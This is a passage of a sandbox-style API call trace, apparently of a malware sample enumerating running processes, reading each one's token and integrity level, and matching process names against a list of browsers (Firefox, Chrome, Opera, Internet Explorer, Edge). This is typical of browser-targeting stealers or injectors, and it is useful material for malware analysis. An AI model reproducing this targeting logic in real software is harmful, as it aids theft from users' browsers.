(lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0241.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0241.185] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.185] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.185] GetLastError () returned 0x7a [0241.185] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.185] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.185] CloseHandle (hObject=0x340) returned 1 [0241.185] CloseHandle (hObject=0x548) returned 1 [0241.185] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.185] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.185] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.185] GetLastError () returned 0x7a [0241.185] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.186] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.186] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.186] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0241.186] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0241.186] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0241.186] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0241.186] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0241.186] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0241.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0241.186] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.186] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.186] GetLastError () returned 0x7a [0241.186] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.186] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.186] CloseHandle (hObject=0x340) returned 1 [0241.186] CloseHandle (hObject=0x548) returned 1 [0241.186] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.186] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.186] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.186] GetLastError () returned 0x7a [0241.186] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.186] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.186] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.186] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0241.186] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0241.186] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0241.186] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0241.186] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0241.186] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0241.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0241.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0241.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0241.186] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.186] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.186] GetLastError () returned 0x7a [0241.186] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.187] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.187] CloseHandle (hObject=0x340) returned 1 [0241.187] CloseHandle (hObject=0x548) returned 1 [0241.187] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.187] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.187] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.187] GetLastError () returned 0x7a [0241.187] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.187] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.187] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.187] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.187] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.187] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0241.187] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.187] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.187] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0241.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0241.187] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.187] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.187] GetLastError () returned 0x7a [0241.187] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.187] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.187] CloseHandle (hObject=0x340) returned 1 [0241.187] CloseHandle (hObject=0x548) returned 1 [0241.187] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.187] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.187] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.187] GetLastError () returned 0x7a [0241.187] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.187] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.187] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.187] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0241.187] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0241.187] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0241.187] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0241.188] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0241.188] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0241.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0241.188] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.188] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.188] GetLastError () returned 0x7a [0241.188] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.188] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.188] CloseHandle (hObject=0x340) returned 1 [0241.188] CloseHandle (hObject=0x548) returned 1 [0241.188] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.188] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.188] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.188] GetLastError () returned 0x7a [0241.188] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.188] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.188] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.188] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0241.188] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0241.188] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0241.188] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0241.188] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0241.188] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0241.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0241.188] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.188] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.188] GetLastError () returned 0x7a [0241.188] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.188] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.188] CloseHandle (hObject=0x340) returned 1 [0241.188] CloseHandle (hObject=0x548) returned 1 [0241.188] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.188] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.188] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.188] GetLastError () returned 0x7a [0241.189] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.189] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.189] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.189] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0241.189] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0241.189] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0241.189] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0241.189] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0241.189] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0241.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0241.189] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.189] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.189] GetLastError () returned 0x7a [0241.189] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.189] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.189] CloseHandle (hObject=0x340) returned 1 [0241.189] CloseHandle (hObject=0x548) returned 1 [0241.189] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.189] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.189] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.189] GetLastError () returned 0x7a [0241.189] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.189] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.189] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.189] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.189] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0241.189] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.189] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.189] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.189] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0241.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0241.189] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.189] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.189] GetLastError () returned 0x7a [0241.189] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.189] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.190] CloseHandle (hObject=0x340) returned 1 [0241.190] CloseHandle (hObject=0x548) returned 1 [0241.190] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.190] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.190] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.190] GetLastError () returned 0x7a [0241.190] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.190] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.190] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.190] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0241.190] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0241.190] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0241.190] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0241.190] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0241.190] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0241.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0241.190] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.190] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.190] GetLastError () returned 0x7a [0241.190] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.190] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.190] CloseHandle (hObject=0x340) returned 1 [0241.190] CloseHandle (hObject=0x548) returned 1 [0241.190] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.190] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.190] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.190] GetLastError () returned 0x7a [0241.190] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.190] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.190] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.190] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0241.190] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0241.190] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0241.190] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 